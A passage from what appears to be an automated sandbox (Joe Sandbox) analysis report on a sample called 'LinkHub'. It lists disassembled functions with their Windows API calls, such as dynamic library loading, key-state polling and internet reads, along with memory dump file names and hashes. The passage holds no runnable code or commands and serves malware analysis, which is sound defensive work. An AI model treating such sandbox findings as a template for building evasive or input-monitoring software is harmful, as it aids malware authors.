                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00CF999D
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CF9A2D
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF9A49
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CF9A8F
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00CF9AAF
                                                                      • Part of subcall function 00C8F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CE1A02,?,753CE610), ref: 00C8F9F1
                                                                      • Part of subcall function 00C8F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00CD0354,00000000,00000000,?,?,00CE1A02,?,753CE610,?,00CD0354), ref: 00C8FA18
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                    • String ID:
                                                                    • API String ID: 666041331-0
                                                                    • Opcode ID: 8ddb05370473602a33bc691871b6b4ee3247fa14fe82e1caac384708f972f8e3
                                                                    • Instruction ID: 58c9aef565d545660c247cac4bf64561bed6c959ec7f271375b0a6912d40adca
                                                                    • Opcode Fuzzy Hash: 8ddb05370473602a33bc691871b6b4ee3247fa14fe82e1caac384708f972f8e3
                                                                    • Instruction Fuzzy Hash: 6A515F35600209DFCB51EF59C484AADBBF1FF09314B058099E91A9B362D731EE85DF92
                                                                    Function 00D075AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00D0766B
                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00D07682
                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00D076AB
                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00CEB5BE,00000000,00000000), ref: 00D076D0
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00D076FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MessageSendShow
                                                                    • String ID:
                                                                    • API String ID: 3688381893-0
                                                                    • Opcode ID: dd9ae4ac557bb91468acbc8c4006b7c35d1d3d81109274d99c72b3a73d592d03
                                                                    • Instruction ID: c1ec3b558cc5ea4cfd9074def2f4b04a32bc4734e94f0a2266672384ced1f45c
                                                                    • Opcode Fuzzy Hash: dd9ae4ac557bb91468acbc8c4006b7c35d1d3d81109274d99c72b3a73d592d03
                                                                    • Instruction Fuzzy Hash: B341BF35E08604AFC7648F6CCC48FA57B65EB46350F990224F85EAB3E0C772AD51DA60
                                                                    Function 00CA23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 6ee1da9ecfc4f0d288365aa0301814505b03f81d763768766413246c051bf668
                                                                    • Instruction ID: 0595560ad165bea99796fa7fc1a0120bdd71a5db3882431d0d5e7b076408bd4f
                                                                    • Opcode Fuzzy Hash: 6ee1da9ecfc4f0d288365aa0301814505b03f81d763768766413246c051bf668
                                                                    • Instruction Fuzzy Hash: 3241E236A002219FCB24DF7CC880A5DB3E6EF8A718F1545A8E915EB351D730EE01DB90
                                                                    Function 00C719CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C719E1
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 68674aefbf82e9cd331ed4a8635c3ab9c0995268793908369bf9dda1582cd422
                                                                    • Instruction ID: fe4c44492d621e2350981562b1988c71c3141eedda9f6ba6ef3f2a1a3a8353d3
                                                                    • Opcode Fuzzy Hash: 68674aefbf82e9cd331ed4a8635c3ab9c0995268793908369bf9dda1582cd422
                                                                    • Instruction Fuzzy Hash: FC415E71A0425AFFDF159FA8C844BEEB775FB05334F24821AE839A6290C7306A54DB61
                                                                    Function 00CE42B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00CE4310
                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CE4367
                                                                    • TranslateMessage.USER32(?), ref: 00CE4390
                                                                    • DispatchMessageW.USER32(?), ref: 00CE439A
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE43AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                    • String ID:
                                                                    • API String ID: 2256411358-0
                                                                    • Opcode ID: ae0f9136b0440e61768c91a42d6e05bd9d4165fca7413374636dc097234e5116
                                                                    • Instruction ID: 1b08b1c803f988b5b518fde30cdc6b79e7e847425a798c36cd6e4a6e28a75a8a
                                                                    • Opcode Fuzzy Hash: ae0f9136b0440e61768c91a42d6e05bd9d4165fca7413374636dc097234e5116
                                                                    • Instruction Fuzzy Hash: 0C319374544385DFEB3DCF76D849BB63BA8AB02305F440569E4B6C22B0E7B49945CB31
                                                                    Function 00CD224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD2262
                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00CD230E
                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00CD2316
                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00CD2327
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00CD232F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 5ff7e276f48e8c3bbb6e8c5a868d560db35948987bb57e4f13164f80bfd38c71
                                                                    • Instruction ID: 303a9d88bc20d7b1b17f1788c251e827d7075bdbbfc5d8f7486a98611f87a31a
                                                                    • Opcode Fuzzy Hash: 5ff7e276f48e8c3bbb6e8c5a868d560db35948987bb57e4f13164f80bfd38c71
                                                                    • Instruction Fuzzy Hash: 7A318F71900219EFDB14CFA8CD89A9E7BB6EB14325F104226FA25E73D0C7709A54DBA1
                                                                    Function 00CED95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00CECC63,00000000), ref: 00CED97D
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00CED9B4
                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00CECC63,00000000), ref: 00CED9F9
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CECC63,00000000), ref: 00CEDA0D
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CECC63,00000000), ref: 00CEDA37
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    • API String ID: 3191363074-0
                                                                    • Opcode ID: 989e18ad8a72a20857a5e9a4abf749fea44902ecc31cebb7128d9dc17a534ed6
                                                                    • Instruction ID: ed7711a0065a692106fd5affcaf107dfca687f19f0f676dc731021ab78fe9cee
                                                                    • Opcode Fuzzy Hash: 989e18ad8a72a20857a5e9a4abf749fea44902ecc31cebb7128d9dc17a534ed6
                                                                    • Instruction Fuzzy Hash: 63314871604345EFDB20DFA6DC85AAEBBF9EB04350B20442EE55BD2251DB30EE41EB60
                                                                    Function 00D061A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D061E4
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D0623C
                                                                    • _wcslen.LIBCMT ref: 00D0624E
                                                                    • _wcslen.LIBCMT ref: 00D06259
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D062B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 763830540-0
                                                                    • Opcode ID: 7385ceb359c06080ff3b809ee0730447d62e6c661036bb9de882d0efa35fe3ef
                                                                    • Instruction ID: 262d4ebf9d8ae62a2f1edfe85c0163fcd793d8207863f916d77620cb33158c3e
                                                                    • Opcode Fuzzy Hash: 7385ceb359c06080ff3b809ee0730447d62e6c661036bb9de882d0efa35fe3ef
                                                                    • Instruction Fuzzy Hash: E6218F319002189ADB10DFA0DC84BEE7BB9EF45320F144256F929EA2C4D770C995CF61
                                                                    Function 00CF138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00CF13AE
                                                                    • GetForegroundWindow.USER32 ref: 00CF13C5
                                                                    • GetDC.USER32(00000000), ref: 00CF1401
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00CF140D
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00CF1445
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: db276fed89c06cb2c34f33bf63b390f37fb5d731755c30e986e28ab7bd74a3cf
                                                                    • Instruction ID: 10b6602eba3b8fde09ba00f688dddc53757c17b9a80969b7cf933e97c866f72d
                                                                    • Opcode Fuzzy Hash: db276fed89c06cb2c34f33bf63b390f37fb5d731755c30e986e28ab7bd74a3cf
                                                                    • Instruction Fuzzy Hash: BD216036600218EFD754EFA5C884AAEB7F9EF48340B04846DF95AD7761CA30AD04DFA0
                                                                    Function 00CAD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00CAD146
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CAD169
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CAD18F
                                                                    • _free.LIBCMT ref: 00CAD1A2
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CAD1B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 1f1301ede62b5f7cb43aa201805d2c743487bd590abac30fec9fc85d1ba11e61
                                                                    • Instruction ID: 5e8e8823b533fbf3320977c73d9c215e32ef616476162fc72646dc014bf6b576
                                                                    • Opcode Fuzzy Hash: 1f1301ede62b5f7cb43aa201805d2c743487bd590abac30fec9fc85d1ba11e61
                                                                    • Instruction Fuzzy Hash: A901B17660171A7F632126AA5C88D7F7A6EDEC3B79314012AFA0BC2250DA608E0191B1
                                                                    Function 00CD6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 75ce1dd996e0ce6236669a4ee238949f0532575a8b92c31d80f6be1f1437aa7e
                                                                    • Instruction ID: 4dd77d71bb5faf002789dc839f6843aaf5e061f1c1fc7c874594312dd03caf20
                                                                    • Opcode Fuzzy Hash: 75ce1dd996e0ce6236669a4ee238949f0532575a8b92c31d80f6be1f1437aa7e
                                                                    • Instruction Fuzzy Hash: 9C0192B1604306BF961066219D82EBB735D9F50398B084023FE069A342EB61FE94D2B9
                                                                    Function 00CA316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(74DE2E40,?,?,00C9F64E,00CA3BD6,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3170
                                                                    • _free.LIBCMT ref: 00CA31A5
                                                                    • _free.LIBCMT ref: 00CA31CC
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA31D9
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA31E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 25eaf95b098ab05a8a66bf5b5ed5747a760175a2dfd089961481a927f4e44af6
                                                                    • Instruction ID: 1047bf7d725079d714693eba8a03385c5d4e36dd682bcd00d5fb420e208ce702
                                                                    • Opcode Fuzzy Hash: 25eaf95b098ab05a8a66bf5b5ed5747a760175a2dfd089961481a927f4e44af6
                                                                    • Instruction Fuzzy Hash: FC01F976A407532BD6126779EC55E2F266A9BC337D3200425FA25E22D1EF218B019170
                                                                    Function 00CD08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?,?,00CD0C4E), ref: 00CD091B
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0936
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0944
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?), ref: 00CD0954
                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0960
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 13f254ab7aff13b4abc7c2565e482a1f048624809a058e564ec3993a88c8bc26
                                                                    • Instruction ID: b147d9f64e3fe90bc50af65ea387558d39f4bba6e1cc6a3b20eb4b0f2790dcc6
                                                                    • Opcode Fuzzy Hash: 13f254ab7aff13b4abc7c2565e482a1f048624809a058e564ec3993a88c8bc26
                                                                    • Instruction Fuzzy Hash: 9B018F72600304AFEB104F99DC48B9A7BAEEB48751F244126FA09E2312D771DE40DBA0
                                                                    Function 00CDF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00CDF2AE
                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00CDF2BC
                                                                    • Sleep.KERNEL32(00000000), ref: 00CDF2C4
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00CDF2CE
                                                                    • Sleep.KERNEL32 ref: 00CDF30A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: fdf67a98a6051799db40257cd8a8b8515cb3a629331b4fc53ade35e111bfa3ff
                                                                    • Instruction ID: 574520de32fb771d5617da22900bcba8b166a4c1e6eb62c148dc89b25a37fac1
                                                                    • Opcode Fuzzy Hash: fdf67a98a6051799db40257cd8a8b8515cb3a629331b4fc53ade35e111bfa3ff
                                                                    • Instruction Fuzzy Hash: A4011771D01619DBCF00AFE5E849AEEBB79BB08711F02046BE612F2360DB309655C7A6
                                                                    Function 00CD1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
